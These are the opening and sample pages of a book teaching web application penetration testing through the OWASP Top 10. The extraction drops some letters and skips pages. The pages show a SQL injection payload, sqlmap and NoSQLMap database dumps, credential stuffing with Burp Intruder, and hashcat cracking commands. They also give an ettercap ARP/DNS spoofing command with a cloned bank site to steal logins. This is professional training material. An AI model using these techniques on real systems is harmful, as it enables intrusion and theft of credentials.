The Penetration Tester S Guide To Web Applications
The Penetration Tester S Guide To Web Applications
HOUSE
ARTECH HOUSE
INTERNET/COMPUTER SECURITY
INFORMATION
SECURITY
INFORMATION SECURITY AND PRIVACY SERIES
AND PRIVACY
SERIES
borso
The
This innovative resource provides both professionals and aspiring professionals
penetration
applications. It describes each of the Open Web Application Security Project (OWASP)
top ten vulnerabilities, including broken authentication, cross-site scripting, and
insecure deserialization, and details how to identify and exploit each weakness.
Tester’s guide
Readers learn to bridge the gap between high-risk vulnerabilities and exploiting
flaws to initiate shell access. The book demonstrates how to work in a professional
services space to produce quality and thorough testing results by detailing the
to web applications
requirements of providing a best-of-class penetration testing service. It offers
insight into solutions on how to approach a web app pen test and the challenge
of integrating a mature pen testing program into an organization. Based on the
author’s many years of first-hand experience, this book provides examples of how
to break into user accounts, how to breach systems, and how to configure and
wield penetration testing tools. serge borso
Serge Borso is the founder and CEO of SpyderSec, an independent security consulting
organization specializing in penetration testing services, OSINT solutions, and security
awareness training programs. He is also an instructor at the SANS Institute and a private
cybersecurity consultant. He received his M.Sc. in computer systems security from
Colorado Technical University.
ARTECH HOUSE
BOSTON I LONDON
www.artechhouse.com
Serge Borso
All rights reserved. Printed and bound in the United States of America. No part of this book
may be reproduced or utilized in any form or by any means, electronic or mechanical, including
photocopying, recording, or by any information storage and retrieval system, without permission
in writing from the publisher.
All terms mentioned in this book that are known to be trademarks or service marks have been
appropriately capitalized. Artech House cannot attest to the accuracy of this information. Use of
a term in this book should not be regarded as affecting the validity of any trademark or service
mark.
10 9 8 7 6 5 4 3 2 1
Preface vii
1 Introduction 1
2 OWASP A1:2017 Injection 9
3 OWASP A2:2017 Broken Authentication 31
4 OWASP A3:2017 Sensitive Data Exposure 43
5 OWASP A4:2017 XML External Entities (XXE) 55
6 OWASP A5:2017 Broken Access Control 77
7 OWASP A6:2017 Security Misconguration 97
8 OWASP A7:2017 Cross-Site Scripting (XSS) 119
9 OWASP A8:2017 Insecure Deserialization 137
10 OWASP A9:2017 Using Components with Known
Vulnerabilities 151
11 OWASP A10:2017 Insucient Logging and Monitoring 167
12 Beyond the OWASP Top 10 179
13 Testing as a Consultant and Adding Value 195
14 About the Author 199
15 Index 201
v
Preface
Welcome to the world of web application penetration testing! The purpose
of this book is to explain how a professional penetration tester attacks web
applications. This book will start by providing some background information
on penetration testing, web applications (web apps), discuss why we care
about web applications, and proceed to discuss methodology and attacks. A
primary focus will be on the OWASP top ten; identifying these aws, and
exploiting them in a meaningful way. Throughout the chapters dedicated to
specic vulnerabilities, special attention will be paid to making the content
easy to understand and each chapter will include examples, real-world stories,
references to hands-on training, and nal thoughts on the vulnerability in
question. You will obtain a clear understanding of the details of the aw,
how to exploit the aw, and the background information necessary to provide
value to your organization. The world of web applications is vast and trying
to t everything into one book would not do justice to the reader; thus, some
topics will not be covered in depth in this book.
The target audience of this book is people already performing penetra-
tion testing, primarily in-house penetration tests you conduct as part or all
of your day job. People new to the world of penetration testing, perhaps
researching the topic to help with bug bounty programs, or students should
nd it a helpful reference guide for protocol/professionalism and for gaining
technical acumen. Professionals/consultants conducting penetration tests for
clients will be able to leverage this book to enhance their current processes
and skill sets. This book is meant for an audience equipped with intermediate-
level web or application security skills. You should know the inner workings
of TCP/IP, HTTP, and encryption. You should have experience registering
a domain name, conguring a web server, setting up SSH keys, SSL/TLS
certicates, and running a website at a minimum. You should be familiar
with programming languages, know the dierence between the web and the
vii
viii The Penetration Tester's Guide to Web Applications
internet, and be aware of OWASP, CVEs, CVSS scoring and the like. Be-
ginners or people new to web application penetration testing should be able
to keep pace and understand most of the topics at a high level. Possessing
a background in application security (appsec) will be helpful for fully un-
derstanding some concepts just as experience with conducting professional
engagements will help the reader understand other topics. Like anything in
life, you will get out of this book what you put in, and as such, it may be in
your best interest to ensure you are well versed in appsec to maximize your
investment.
Penetration testing is dierent than vulnerability scanning and web appli-
cation penetration testing is signicantly dierent than network penetration
testing. When performing a web application penetration test we follow a four-
step methodology: reconnaissance, mapping, scanning, and exploitation.
Reconnaissance is the act of information gathering and comes in the form
of conducting research into our target organization (industry, location, em-
ployees, products/services, domains, hosting, DNS information, etc.), the tar-
get web application (language, CMS, open-source components, aliations,
platform/architecture, etc.), avenues of attack, web properties, and general
accumulation of open source information that we can leverage.
Mapping is how we understand the various relationships between com-
ponents of the application. This is accomplished by browsing and spider-
ing/crawling the application looking for links, submitting forms, paying at-
tention to how the application behaves, and essentially using the application
as it was intended from a nonmalicious user's perspective. Once a map of
the application has been established, more nefarious interactions with the
application take place via actively scanning for vulnerabilities.
As a sidebar, note that during the reconnaissance phase it may be ap-
parent that the content management system (CMS) being used by the appli-
cation has a known vulnerability and matching exploit. Attempt to exploit
it. . . spend up to about twenty minutes if the indicators of exploitation war-
rant this eort at this phase. Know that there is much more work to be
done in order to get a comprehensive view of the attack surface of the web
application and this deviation, while warranted, should be minimized if not
readily exploitable. Take note of the potential for abuse and move back to
the predened methodology for testing.
Scanning is the next step in our four-step methodology and comes in the
form of automated tools and hybrid approaches. Know that in the world of
network penetration testing Nessus, Rapid7/Nexpose, Qualys, and the like
dominate the market. These are not the only mature tools but can also typ-
The Penetration Tester's Guide to Web Applications ix
valid credentials if there is any hope of producing useful results. While this
concept may be foreign to some, it is absolutely imperative (in almost all
cases) that during our web application penetration testing we have credentials
to the application. Ensuring that our tool does not get logged out during its
scanning is also important as every subsequent HTTP request it makes may
be responded to with the likes of a 302 redirect to the login page, eectively
invalidating the rest of the scan. Special care must also be taken to ensure
the automated scanning does not cause harm to the application, its users,
or the back-end data store in the event that data is corrupted or otherwise
rendered unavailable. We'll talk about precautions to take and go into this
in more detail later in the book, but for now know that scanning takes eort
to do right and can provide useful results as we move to the next phase of
our methodology.
The nal phase of our methodology is exploitation and this comes in two
forms: leveraging the work performed by others, for example when we nd
a version number of software and search for a published exploit associated
with that version and proceed to use it, or by performing the research and
testing required to identify a more subtle vulnerability and crafting a working
exploit to take advantage of it. Another very common way to exploit web
application vulnerabilities is by understanding how a class of vulnerability
works, like SQL injection, and identifying that aw in our target application.
For instance, detailed information specic to your application's SQL injection
vulnerability is not going to be published in most cases, whereas the details
of how to identify and exploit SQL injection in general is well documented.
Depending on your skills and experience, your path to exploitation will vary.
Once exploitation has occurred, our four-step methodology starts over at
reconnaissance as we now will likely have access to features of the application
that are new to us such as administrative privilege or the ability to interact
with other users of the application in an unrestricted manner. Know that this
methodology is not meant to stie our eorts but rather to guide our testing
to produce thorough and quality results in a professional manner; we don't
want to miss out on testing for certain vulnerabilities due to a haphazard
approach.
Also know that there can be signicant dierences between exploitation
of web application aws and OS aws as it pertains to the impact of the
exploitation and the level of access gained. Specically, and importantly:
Scanning a network, nding a vulnerability, matching that vulnerability to
an exploit in metasploit and proceeding to gain shell access is not typically
how the process works for web applications. In fact, exploitation of a web
The Penetration Tester's Guide to Web Applications xi
bility and even some actions that can be taken to remediate the nding. This
is important as our job as a penetration tester is not to simply break things
and move on, but rather to write a coherent, well-thought-out report that
the client or our place of business can leverage to gain a deep understating
of the aw, the path to exploitation, as well as how to x it.
The purpose of this book is to explain how a professional penetration
tester attacks web applications, the goal of this book is to help you become
a more procient web application penetration tester, but it's up to you to
get the most out of it! Let's get started, but before we do there is one last
important topic to cover.
Make sure you always obtain explicit written permission from someone
with the authority to grant it prior to engaging in penetration testing, includ-
ing using any of the concepts or tools discussed in this book, and understand
the author assumes no responsibility for your actions.
Chapter 1
Introduction
The OWASP Top 10 represents a broad consensus about the most critical
security risks to web applications. During a web application penetration test,
our goal is to attempt to identify vulnerabilities on the OWASP top ten list
as well as other prevalent application centric vulnerabilities. Before delving
into each vulnerability, we'll take a moment to discuss web application pene-
tration testing, how to best approach an engagement, as well as background
information we'll need to be successful.
The internet is not the same as the web and a website is not the same as
a web application even though these terms are typically used synonymously.
A website is used to refer to a static HTML document with links, images,
perhaps some CSS and that's about it. Using a website was a common way to
share information in the early days of the web. In contrast, a web application
is dynamic. Dynamic in the sense that it takes input, some form of stimuli,
and processes this input to produce an output. An example of this would
be Google's homepage. As an end user, we submit a query (input) in the
search box, press enter and are presented with search results (output). As
a user of this web application we can see the HTML, CSS, JavaScript, and
images required to render the page in our browser; this can be accomplished
by viewing the source code of the page. What we don't see is the server-side
source code, the Python/C++/Java, as this code is housed and processed
by Google's servers. Our browser reads the client-side code and renders the
page while the server-side code takes our input, parses (reads) it, performs
a series of logic operations such as applying its search algorithm, and looks
up the database contents before returning a subset of that information to
1
2 The Penetration Tester's Guide to Web Applications
our browser to ultimately show us the search results. This is dynamic; there
is server-side processing, database lookups and interactivity built into the
platform.
This notion of dynamic is an important one as we delve into penetra-
tion testing and hone in on what is called attack surface. When we embark
on assessing the security posture of a target application, the attack sur-
face is essentially the parts of the target system that are exposed. For a
typical network-based device such as a server, this would be akin to open
ports/listening services, user accounts with access to the system, patch man-
agement, change management, virus updates, replication, and other avenues
that could lead to compromise if manipulated to cause harm. For a website,
there is not much in the way of attack surface as there is no input that will in
turn be processed once submitted other than by the webserver software like
Apache, IIS, or Nginx. For instance, if there is not a database, there is no
risk of SQL injection (SQLi). If there is no input that is processed, then a lot
of the OWASP top ten vulnerabilities are not going to be present. However,
a dynamic web application, as opposed to a static website, is likely going to
have a database, and depending on the application, a signicant amount of
input that can be manipulated to potentially cause harm to the target.
The target of our web application penetration testing is of course the web
app but the attack does not stop there. This book will make the appropriate
distinction between targeting the application and targeting the business or
users of the application like in the case of XSS. This is important because
impact can be measured in a variety of ways such as the impact to business
operations in the event of denial of service (DoS). To adequately perform
a web app penetration test, we have to take into consideration the CIA
triad which should be familiar to all CISSP holders. If any of these three
(condentially, integrity, or availability) components are compromised then
the ability for the target business to do its job in a secure fashion is severely
impaired. As such, from a penetration testing perspective these are some of
the areas where we want to pay special attention when assessing the target
environment.
The target environment is what is dened in the scope of the penetra-
tion test. This will vary depending on the predened rules of engagement.
To simplify this, let's think about a few dierent scenarios in which we may
be conducting a web application penetration test. The rst scenario is a de-
velopment version of our own personal WordPress blog. This blog resides on
a virtual machine on our workstation at home. We update the blog as we
see t and once satised with the changes or new blog posts, we push those
Introduction 3
changes to our production blog on the web. In this scenario, we want to test
our development version running on our virtual machine on our network on
our workstation in our own home: We need absolutely no one's permission to
do this test. We completely own every aspect of the target environment de-
spite the fact that we did not write the WordPress software ourself. We also
didn't write the Apache software running the website, or the Linux operating
system, or the drivers, or the BIOS or. . . . The point is that no special per-
mission is required to conduct this test and we are fully aware of the scope
of what we want tested, in this case only the WordPress web application.
But understand that as we make HTTP(S) requests to our web app, those
requests will be severed by Apache which does run atop an operating system
(OS); thus, while the scope of our test may seem well dened, in fact, the
testing may encompass OS and platform patches/vulnerabilities as well as
TLS and certication implementation and conguration which is no longer
strictly testing the web app.
The second scenario to consider is a web application penetration test of
our corporate agship web app at our place of business. This application
resides on premises in our data center behind multiple layers of security
including an IPS, rewall, and WAF. The business we work for owns the
infrastructure providing the platform for the web application. However, the
codebase is written by a third-party company and our business does not
have access to the source code. As with most mature organizations, there are
multiple versions of this application in multiple environments such as devel-
opment, QA, user acceptance testing (UAT), and production (PROD). This
application is required to be tested for regulatory compliance. Which version
of the application do we test? Do we test remotely from the internet, having
our trac ltered by multiple devices along the way or internally to by-
pass those controls? Do we test using credentials and leverage an automated
scanning tool, and if so, how will that impact other users of the system and
the database? What about permission from the third-party maintaining and
releasing the code; do we need their permission to test their application?
Let's talk about these starting with the scope of the test. The objective
is to perform a web application penetration test of the target web app which
is required for compliance so we have to test it or get evidence (and a recent
report) that the company writing the code is performing penetration test-
ing. This is not the same as static/dynamic code scanning or vulnerability
scanning; recall that penetration testing has dierent goals than scanning for
vulnerabilities, a specic methodology and potentially high risk for negative
impact as well as a signicant eort dedicated to the manual component
4 The Penetration Tester's Guide to Web Applications
of the testing. Generally speaking, since the application resides in our en-
vironment, we can test it as we see t without any need to seek or obtain
approval from the authors of the code (noting that we are not entitled to
reverse engineer the software).
Testing from the internet, having our trac sent through the rewall, IPS,
and WAF when we are not whitelisted on these devices can result in much
less of a test on the web application and more of a test on these trac ltering
devices positioned logically in front of and protecting the web application (as
seen in Figure 1.1). When the objective is to test the web application, I nd
it best to either be whitelisted on these devices, test internally to avoid these
devices, or clearly understand and communicate the results of testing may
be more prone to false negatives. The reason for this is because we want to
identify vulnerabilities on the web application and attempt to quantify the
level of risk: If there is a SQLi aw on the application and the WAF blocks
our SQLi attacks to the point where we are unaware of the aw, this type
of testing arguably is not providing the most value to the business if the
objective is to identify application layer vulnerabilities. There may be a time
when the WAF is no longer in place, or not tuned the same way, or a lter
bypass is discovered or an avenue of attack does not traverse the WAF all
good reasons as to why the business and application developers would benet
from learning about the SQLi aw. An argument from the business on this
logic may bring into light that attackers are going to be sending trac from
the internet and having their packets ltered, thus, a fair and realistic test
would be to leave those devices in place. This is not illogical and essentially
becomes a discussion to have with the business.
In many cases the production version of the application is tested op-
posed to the development or QA or other versions. There are several reasons
why: First, I think that it would be hard to justify robust, high-quality pen-
etration testing on all versions of the application; this would be more of
Figure 1.1 This image is meant to depict the general ow of trac.
Introduction 5
other than our developers and security team are responsible for securing the
code and platform. Thus, the same controls such as rewalls, IPSs and WAFs
are still part of the conversation, they are just virtualized and oered as a
service.
To nish the discussion on scoping and rules of engagement/testing re-
quirements, know that subdomains (host.example.com, host1.example.com,
etc.) may also be in-scope but potentially hosted somewhere else completely.
Also, we want to focus on identifying and exploiting at a minimum on the
OWASP top ten vulnerabilities knowing that there are many other vulner-
abilities and categories of aws we need to attempt to identify and exploit.
What OWASP has done with its top ten list is highlight the most common
and impactful aws typically impacting web apps, and as such these aws
will serve as the backdrop of a large portion of this book.
Modern web applications don't have SQLi on the login page, they have
proper security headers in place and employ TLS with a well-congured cer-
ticate and cipher suite. Development frameworks and libraries have built-in
protection for Cross Site Request Forgery (CSRF/XSRF) and Cross Site
Scripting (XSS). Cookies and authentication tokes are suciently random-
ized/complex and set with Secure, HttpOnly and SameSite ags. PCI dictates
account lockouts, password strength meters are somewhat common, and ma-
ture applications/organizations host their products behind multiple layers
of security. Easy-to-identify and impactful to exploit vulnerabilities are be-
coming harder and harder to nd. Know your target environment, know the
impetus or driving force behind the penetration test, and plan accordingly to
put yourself into a position to get the best results because there are vulner-
abilities to be found and exploited. Remember, we want to break into these
applications, gain access to sensitive information, compromise accounts, get
shell access, escalate privilege, and own the environment; do what you need
to in order to set yourself up for success!
Chapter 2
9
10 The Penetration Tester's Guide to Web Applications
dierences in how the application responds is our key to identifying the aw
and will be a recurring theme for identifying other vulnerabilities later in this
book. For example, the input of test should be benign and not cause an issue
whereas the input of test' may cause an error with the application due to
the single quote character being interpreted literally by SQL. By submitting
both of these inputs, one at a time, to the application and simply noticing
how the application responds to each input, we may be able to easily identify
a SQL injection issue. For instance, if the application's response results in a
page stating, "No results were found" when test was submitted and "There
is an error in your SQL syntax" when test' is submitted, we can deduce there
is likely an injection aw with the application.
Another thing to consider when working with injection aws is blind in-
jection, meaning that there is less of an obvious indicator that the application
may be vulnerable. There are varying degrees of blindness ranging from not
blind at all (an error message is displayed to the user when an injection at-
tack is submitted), to partially blind (no error messages are displayed but
discernible dierences in behavior are evident) as in the case of time-based
attacks (when we inject a command telling the SQL query to wait for an at-
tacker dened period of time before return the query results), to completely
blind where we have no real indicator that the application is vulnerable. . .
but it is. There are situations where blind injection (SQL, command, LDAP,
and other forms) is a logical vulnerability to test for, in which case we need to
be prepared to launch injection attacks that can still yield identiable results
even if those results are not always evident in our browser. To do this we
need to setup a VPS accessible to the internet or otherwise accomplish the
same goal using a locally hosted machine.
VPS hosting is cheap and we don't need signicant resources for what
we are trying to accomplish; specically, a Linux OS which we can SSH to
and have root access on will suce. This setup with one virtual CPU, one
gigabyte of RAM, and twenty gigabytes of disk space is more than sucient
and costs pennies to run on a per hour basis. What we want to do is take
note of the IP address of the VPS and execute TCPdump to listen for in-
coming trac (other than our own SSH trac) as seen in Figure 2.1. Now
when we execute our next command injection attack we can use the attack
OWASP A1:2017 Injection 13
Examples: For this rst example we will be targeting a form with three
dierent input elds. Visible on the page are input boxes associated with
Product, Customer, and Account Password. To rst get a baseline of how the
application should normally process input and return output we will submit
test as the input for the Product and Customer text boxes and submit the
form by clicking View, as seen in Figures 2.2 and 2.3, respectively.
14 The Penetration Tester's Guide to Web Applications
The resulting page shows the query including the rudimentary authentication
mechanism worked and no results were returned.
Next we will perform the same action only substituting test with test' - note
the single quote character and refer to Figures 2.4 and 2.5. The hope is that
we will see a dierent result in eect conrming the application is dynamic
and the inputs we submit are being used to perform a query.
OWASP A1:2017 Injection 15
from MS SQL syntax for example and knowing which language is being used
will help us craft our attack in a manner for it to be successful. A typical
query apropos for this example might be, "SELECT * FROM tablename
where product='$productname' and customer='$customername'". Based on
this pseudocode (query) the two parameters, "productname" and "customer-
name" are what we as an attacker can inject into, thus potentially changing
the results of the query. For instance, instead of submitting test' in the Prod-
uct input eld, let's see what happens when we submit test' or '1'='1' into
the Product input box as seen in Figure 2.6. The output shows results for all
of the products in the database of the vulnerable application. Further and
meaningful exploitation of this nding will hinge on what other data is in
the database and while manually nding this out, now is a fair time to intro-
duce a tool to help automate this attack. The tool we will be using is called
sqlmap, which is an open-source Python-based tool specically written to aid
in SQL injection attacks. The best way to become familiar with the tool, in
addition to using it repeatedly in various circumstances, is by invoking it on
the command line with the hh option to see a quick reference of its options
as seen in Figure 2.7.
Figure 2.9 sqlmap command line syntax specifying POST payload via "data"
argument.
By specifying the dump option we are able to dump the contents of the
database successfully, as we can see in Figure 2.12.
OWASP A1:2017 Injection 21
Figure 2.14 nosql injection attack strings being submitted via the HTML form.
Note once again that in a real-world scenario an evident error message is not
always present and even when we are presented with an error, the message
may not be clear or helpful. As we have been presented with an error, we
could manually continue to exploit the application, the success of which will
hinge on our knowledge of the back-end database, the syntax, and our mas-
tery of the SQL (NoSQL)language. In this case it may be benecial to once
again look to a tool to assist in the exploitation of the aw. Akin to sqlmap,
NoSQLMap is a tool that attempts to aid in NoSQL injection attacks. It is
not as mature, reliable, or as feature-rich as its namesake, but we can at-
tempt to use it in this scenario. To do so, we can invoke NoSQLMap via the
command line and proceed to set the required parameters before executing
the attack. We can follow Figures 2.16, 2.17, 2.18, and 2.19 for insight into
how to do this.
Figure 2.18 nosqlmap executing its initial attacks on the target application.
OWASP A1:2017 Injection 27
Figure 2.19 nosqlmap showing a successful injection and applicable vulnerable URLs.
The results of the attack can be viewed in a browser to reveal the dump of
database information as shown in Figure 2.20.
Details: The second most critical web application security risk is Broken
Authentication and the previous denition is provided by OWASP (as others
will be in subsequent chapters). The concept of Broken Authentication en-
compasses many aws that we will discuss in this chapter. Web applications
utilize the HTTP protocol to communicate, which is stateless in nature. This
means that every request a user/client sends to a web application is treated
and understood as a new request unaliated with previous requests. This
inability to natively group a series of requests together has obvious short-
comings; for instance, how does a web application know whom a user is?
The answer to this is with some form of session management, a means by
which the application can establish an understanding that requests with a
unique identier should be treated as the same user essentially. This unique
identier is typically a cookie or token, but it doesn't have to be. Any unique
string sent back and forth from the client to the server will suce, as long as
the application and client can keep track of it. Session management can be
implemented in the form of a unique string in the address bar of our browser,
as is the case with a Java Session ID as seen in Figure 3.1.
31
32 The Penetration Tester's Guide to Web Applications
What happens when a user submits this form? What back-end process-
ing/logic is being employed to check if the values submitted by the user
are valid and how does the application handle errors, invalid input, password
hashing, session management, password resets, account creation, two-factor
authentication, failed login attempts, account lockouts, request throttling, IP
banning, dictionary attacks, logout requests, and so forth? Creating a web-
site that has a login form is not overly challenging but creating a pleasant
user experience while implementing sucient security controls is extremely
challenging, which is why this is the second most critical web application
security risk: It's hard to do well. And to be clear, there is no standard way
to implement this type of authentication as a developer can choose to ask
whatever questions they like, as well as integrate with multifactor solutions
or even biometrics if desired. Conversely, the level of security being imple-
mented using forms-based authentication can be essentially nonexistent; the
approach taken when using this method is entirely nonstandard.
Real-World Dialog: One of the more interesting fails I have seen through-
out my career as a penetration tester is a rather oddly implemented password
reset feature on a custom application in the nancial sector. The web appli-
cation I was testing looked like any other modern web application, complete
34 The Penetration Tester's Guide to Web Applications
with common features such as the ability to create your own account, login,
change your password, access a dashboard, and so on, as well as the option
to reset your password in the event that you forgot it. Study Figure 3.4
and think about how the application ought to work given this background
information.
Logically we might provide our username and email address, submit them
and the application will in turn check to see if the email address is valid and
belongs to a user account corresponding to the username that we provide.
This way, the user submitting the form has to know the username and email
address associated with that username in order to successfully issue a pass-
word reset request. Following this logic, if the username and email address
are valid and associated with each other, then the application will send a
password reset link to the provided user's associated email address. Seems
easy. . .
In reality what this form did was allow a user to put in a username and
ANY ARBITRARY email address the user wanted. It then checked to see if
the username was that of a valid user account, and if it was, then the appli-
cation would send the password resent link to the email address indicated by
the user (as opposed to the email address associated with the account). This
was of particular concern due to the application being vulnerable to username
harvesting/account enumeration. This means that I was able to conrm valid
users of the application using the username harvesting aw, reset their pass-
words, and receive the link to update their password in my inbox! This type
OWASP A2:2017 Broken Authentication 35
let's be smart about this attack: If the application clearly enforces password
complexity requirements for user accounts (like a minimum of 8 characters, at
least one uppercase/lowercase/number/special character, etc.), then we need
to modify our password input list to conform to the requirements, otherwise
we are just wasting time and lacking professionalism. On this professionalism
topic, also consider the sheer number of requests we will be sending for this
attack and the impact this can have on the web application, infrastructure,
and business (10,001 user accounts times 1,000,000 password guesses equates
to over 10 billion requests), so be sure to plan accordingly. We can accomplish
the automated portion of this attack by using a custom written script or
interception proxy tool such as Burp Suite. When using Burp Suite, we rst
prime the interface by using our browser integrated with the proxy to make
a login request to the application and choose to send that (typically POST)
request to Burp's Intruder feature as seen in Figure 3.5.
Burp Intruder is a fuzzing tool which we can use to automate the attack
by populating the username and password parameters with the lists of user-
OWASP A2:2017 Broken Authentication 37
names and passwords previously discussed. Burp Intruder will then, depend-
ing on how we congure it, proceed to try to login to every username we
provided using all one million passwords and continue to do this for each ac-
count, hence the excess of ten billion requests. For this example we will not
need or want to send so many requests, also note the cluster bomb option
and utilize Burp's help section for details on the injection options available.
In order to specify multiple payload positions with diering payload lists, the
cluster bomb option is ideal. In this fashion we can specify the usernames
and passwords we want to attempt to login with, as seen in Figure 3.6.
The rst payload set (from left to right, top to bottom per the previous
Positions tab in Burp) is the usernames while the second payload set is the
passwords. We can see the conguration for this in Figure 3.7. Once this
attack is launched, Burp will proceed to attempt to login with each username
password combination until it exhausts its input lists.
38 The Penetration Tester's Guide to Web Applications
The results of this credential stung attack are not evident unless we know
what to look for. When a successful login occurs (our attack was able to guess
the right username and password combination) the application may issue a
redirect (HTTP response code 302) or the size of the response may be larger
than that of failed logins. It is incumbent upon us to identify what constitutes
a successful login and use this information to identify when accounts were
successfully compromised.
Guessing passwords is not ideal although it is an attack focused directly
on the application (and indirectly on the guessability of weak passwords) and
it works in many circumstances. There are, however, other ways to exploit
broken authentication, such as bypassing it completely.
One such bypass technique is attempting to directly access the pages (or
functions) of an application without logging in rst. This method requires
knowledge of the protected pages the pages of the application which should
only be accessible when logged in. For single-page applications there is less
focus on the page, since there is only one, and more of a focus on the func-
tion/endpoint being called. For traditional and single page applications, the
best way to go about testing for this aw is by leveraging our test credentials
while making note of the pages or functions which are accessible once logged
OWASP A2:2017 Broken Authentication 39
attackers need to identify which controls are in place in order to tune our
attacks to bypass the control. For example, noticing how many failed login
events it takes to trigger an account lockout and determining how long the
account will remain locked out before automatically being reset. This can be
identied by locking out a legitimate account and tracking how many failed
logins were required to trigger this condition in a given timeframe.
Figure 3.12 The password policy for user accounts of a given web application.
This can be accomplished by starting with a list of passwords (such as from
/usr/share/wordlists/rockyou.txt.gz in Kali) and using bash to lter out only
the conforming passwords from the 14 million+ passwords in the le. A com-
mand to output all 8+ character words can be seen in Figure 3.13.
Figure 3.14 Grepping ltered results for strings with at least one number.
A command to output all 8+ character words with at least one number and
at least one special character is shown in Figure 3.15.
Figure 3.15 Grepping ltered results to match strings with special characters.
These eorts took the initial input of over 14 million passwords and pared
them down to just over 450,000 passwords that all meet the password com-
plexity requirements of the target web application. Taking this approach
results in a wordlist which has been tuned to yield the best results.
Details: The exposure of sensitive data comes in several forms and typically
stems from an application owner failing to properly protect data at rest (in
the database) or in transit. We as attackers can take advantage of this aw
once we identify it. The scope of this aw can be weaknesses in client-side
security as well as server-side security, as both endpoints have to be con-
gured correctly to eectively reduce the likelihood of this type of attack
causing harm. Sensitive data essentially equates to anything that should be
kept private, could be used to compromise the session, cause a breach, or
is otherwise a prime target for an attacker. Such data would be the session
token, credit card information, credentials, keys, or nancial records. To gain
access to these resources we can rely upon other OWASP top ten vulnera-
bilities such as Injection, Cross-Site Scripting, XML External Entities, and
others to provide the initial point of access. There are, however, somewhat
passive ways we can identify where to look to nd likely paths to the ex-
posure of sensitive information. HTTP headers are a smart place to look
43
44 The Penetration Tester's Guide to Web Applications
specically paying attention to how the application tells the browser to cache
resources and checking to see if the HTTP Strict Transport Security Header
(HSTS) has been set. HSTS is a means by which an application can enforce
browsers to communicate with the application over an encrypted connection.
When this header is not in place and both HTTP and HTTPS connections
are available for a web server (even if a redirect from HTTP to HTTPS
exists) we as an attacker may be able to compromise the connection and ex-
pose sensitive information. In addition, browsers will cache pages even over
HTTPS depending on how the web server is congured, which means that
on the client-side there may be an exposure of sensitive information that can
be subsequently compromised.
There are other times when an application may be congured to store
sensitive information in a hashed form in the database, such as for user's
passwords, but when the wrong hashing algorithm is in use this too can lead
to predictable results. A famous case study is the repeated Yahoo! breaches in
which it was it made public knowledge that the multibillion-dollar company
was hashing user's passwords with an algorithm inappropriate for this task:
MD5. In this case the password hashes were compromised and subsequently
many were cracked with ease. The idea of an application exposing sensitive
data can stem from insecure settings, a lack of proper congurations, and
the like. We as an attacker can take advantage of this by looking for a lack
of encryption or weak cipher suites, case insensitivity with password inputs,
or otherwise weak hashing algorithms and cacheable sensitive information.
ensure the victim attempting to access the intended web application was
instead communicating with my machine over HTTP. The HTTPS redirect
never happened, the browser never knew to connect over HTTP to verify the
authenticity of the web server, and subsequently, when my fake website pre-
sented the user with input boxes requesting credentials, the victim happily
provided them. I, in turn, was able to redirect the user to the real website
to avoid suspicion while using the credentials myself to gain access to their
account.
for the page(s) of interest. Once loaded, click the back button in the browser
to see what was previously entered in the input boxes or in the address bar via
a GET request. Note that each browser handles history, cached content, and
saved form data dierently, and thus this method may not directly divulge
sensitive information, but sometimes it can, as seen in Figure 4.1.
known user account (possibly) or public company to associate with the com-
promised data.
On the command line, password cracking tools typically take several ar-
guments such as the input le comprised of the hashes we want to crack
(in the correct format), the type of cracking we want to perform (dictionary
based, brute force, etc.) perhaps an output le, and the type of hashes to
be cracked. For example, to successfully use the hashcat tool we will rst
download and compile it as this helps to ensure any special hardware at our
disposal is leveraged in our build:
git clone https://github.com/hashcat/hashcat.git
cd hashcat && git submodule update init
make && sudo make install
If successful, this should result in a binary/executable version of hashcat
we can now run with this command and arguments:
hashcat -m 0 -o Cracked MD5Hashes rockyou.txt
The hashcat tool does have specic hardware requirements and is also in-
stalled by default in kali Linux. There are other options for tools such as
John the Ripper which is invoked in much the same way as hashcat. We
can see in Figure 4.3 and Figure 4.4 the hahses and invocation of the tool,
respectively.
Figure 4.5 Using our browser to save the client-side components of a website.
From here we can simply copy the resulting les (a home page and folder
containing the content) to our own web server's home directory and start
Apache to serve the spoofed copy on our own web server. The examples
below convey how to accomplish this, the results of which can be seen in
Figure 4.6. Some modications to the HTML and local content references
may be necessary to make sure images show up properly and links work as
expected.
# cp -r Downloads/Bank Website* /var/www/html
# cd /var/www/html
# cp Bank Website.html index.html
# service apache2 start
# refox 127.0.0.1
OWASP A3:2017 Sensitive Data Exposure 51
Figure 4.6 View of our copied banking website being served locally.
Once we are satised with the copied website, we can now focus our atten-
tion on ettercap to launch the DNS poisoning attack. Before starting et-
tercap we need to modify its DNS conguration le in /etc/etter.dns. The
le is well commented; what we need to do is place our target domain on a
new line dening our attack server's IP address, which should be the same
host on which we are running our Apache web server. For this example,
our target/victim's host is 10.8.40.6, our attack machine (running Apache)
is 10.8.40.4, and the website we are going to impersonate is bigexample-
bank.com. Thus, the resulting etter.dns le would contain a new line like this
(with tabs between each eld):
bigexamplebank.com A 10.8.40.4
With the DNS conguration complete we can now run the ettercap tool
with this command:
ettercap -T -i eth0 -M ARP -w output -P dns_spoof /10.8.40.6///
• -T: Species to stay in text mode
• -i eth0: Species our network interface
• -M ARP: Species to launch an ARP poising attack
• -w output: Chooses the le to write output to
52 The Penetration Tester's Guide to Web Applications
Figure 4.7 Browser view of spoofed website matching legitimate domain name.
At this point a victim would think they are on the legitimate website (unless
they paid special attention to the lack of HTTPS in their browser's address
bar) and proceed to login with their credentials. In a dierent setup, we could
choose to route their requests to the legitimate website essentially acting as a
relay server between the victim client and the insecure host/domain (banking
website in this example). In this fashion we can gather credentials and gain
access to the legitimate banking website. We could even setup a spoofed 2-
factor authentication prompt and relay that to the legitimate website to gain
access to the victim's account.
although there are other ways to secure a network and eectively thwart a
spoong and poisoning attack. In this chapter we discussed how Sensitive
Data Exposure can manifest itself, and how we as attackers can use several
tools to help exploit poorly congured websites. Inadequate caching control,
leaked credentials, and missing security headers are all scenarios web appli-
cation penetration testers will come across in time. Interestingly, the entire
last example, ARP poisoning and DNS spoong, would have been much less
likely to dupe a victim into divulging credentials if only the HSTS header
were set for bigexamplebank.com. In fact, just because we spoofed the DNS
record for a banking website doesn't mean we can bypass the HSTS preload
built into the browser. The mere existence of this header would have resulted
in a browser warning regarding the untrustworthy SSL certicate. Note that
as of 2019, gmail still does not have the HSTS header set. Cryptography
works in most cases when congured properly: bcrypt and scrypt hashes
take signicantly more time to crack compared to MD5, whereas enforcing
TLS connections forces attackers to try harder to compromise connections.
